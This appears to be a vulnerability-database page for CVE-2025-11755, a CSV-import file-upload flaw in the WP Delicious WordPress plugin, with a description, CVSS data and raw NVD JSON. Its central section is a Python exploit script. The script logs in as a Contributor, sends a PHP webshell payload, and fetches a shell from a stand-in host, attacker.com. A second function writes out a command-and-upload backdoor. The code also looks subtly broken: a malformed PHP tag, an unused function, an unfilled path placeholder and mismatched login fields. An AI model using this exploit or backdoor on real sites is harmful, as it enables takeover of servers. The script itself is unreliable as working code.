Security Vulnerability Report
中文
CVE-2025-11755 CVSS 8.8 HIGH

CVE-2025-11755

Published: 2025-11-01 07:15:35
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file uploads when importing recipes via CSV in all versions up to, and including, 1.9.0. This flaw allows an attacker with at least Contributor-level permissions to upload a malicious PHP file by providing a remote URL during a recipe import process, leading to Remote Code Execution (RCE).

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP Delicious – Recipe Plugin for Food Bloggers <= 1.9.0
Delicious Recipes (旧版本名称) <= 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-11755 PoC - WP Delicious Plugin CSV Import RCE Author: Security Researcher Description: Exploits arbitrary file upload via CSV recipe import """ import requests import sys import argparse from urllib.parse import urljoin def create_malicious_csv(): """Generate malicious CSV with PHP webshell""" return '''Recipe Name,Description,Ingredients,Instructions,Image Malicious Recipe,<php system($_GET['cmd']); ?>,"test,test,test","step 1,step 2",http://attacker.com/shell.php.png ''' def exploit_cve_2025_11755(target_url, username, password, attacker_url): """ Exploit the CSV import vulnerability Args: target_url: Target WordPress site URL username: WordPress Contributor+ username password: WordPress password attacker_url: URL to malicious PHP file """ # Setup session session = requests.Session() # WordPress REST API endpoint for recipe import import_endpoint = urljoin(target_url, '/wp-json/delicious-recipes/v1/import/recipe-terms') # Authentication payload auth_data = { 'username': username, 'password': password } # Login to WordPress login_url = urljoin(target_url, '/wp-login.php') login_response = session.post(login_url, data=auth_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Prepare malicious import request # The vulnerability allows arbitrary file upload via remote URL exploit_payload = { 'type': 'recipe', 'import_source': 'csv', 'image_url': attacker_url, # Malicious file URL 'recipe_data': create_malicious_csv() } # Send exploit request try: response = session.post( import_endpoint, json=exploit_payload, headers={'Content-Type': 'application/json'} ) if response.status_code == 200: print("[+] Exploit sent successfully") print(f"[*] Malicious file uploaded via URL: {attacker_url}") print("[*] Access the shell at: {}/wp-content/uploads/delicious-recipes/shell.php") return True else: print(f"[-] Exploit failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False def create_webshell(): """Generate PHP webshell content""" return '''<?php // CVE-2025-11755 Backdoor if(isset($_GET['cmd'])) { system($_GET['cmd']); } if(isset($_POST['upload'])) { file_put_contents($_POST['path'], base64_decode($_POST['data'])); echo "Uploaded"; } ?> ''' if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-11755 WP Delicious RCE Exploit") parser.add_argument("-t", "--target", required=True, help="Target WordPress URL") parser.add_argument("-u", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") parser.add_argument("-l", "--listener", required=True, help="Attacker listener URL for shell") args = parser.parse_args() print("="*50) print("CVE-2025-11755 WP Delicious Plugin RCE") print("="*50) exploit_cve_2025_11755(args.target, args.username, args.password, args.listener)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11755", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:35.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file uploads when importing recipes via CSV in all versions up to, and including, 1.9.0. This flaw allows an attacker with at least Contributor-level permissions to upload a malicious PHP file by providing a remote URL during a recipe import process, leading to Remote Code Execution (RCE)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/delicious-recipes/trunk/src/api/inc/endpoints/class-delicious-recipes-rest-import-recipe-terms-controller.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/603210ca-7231-4c91-8258-fe3cd6e37425?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.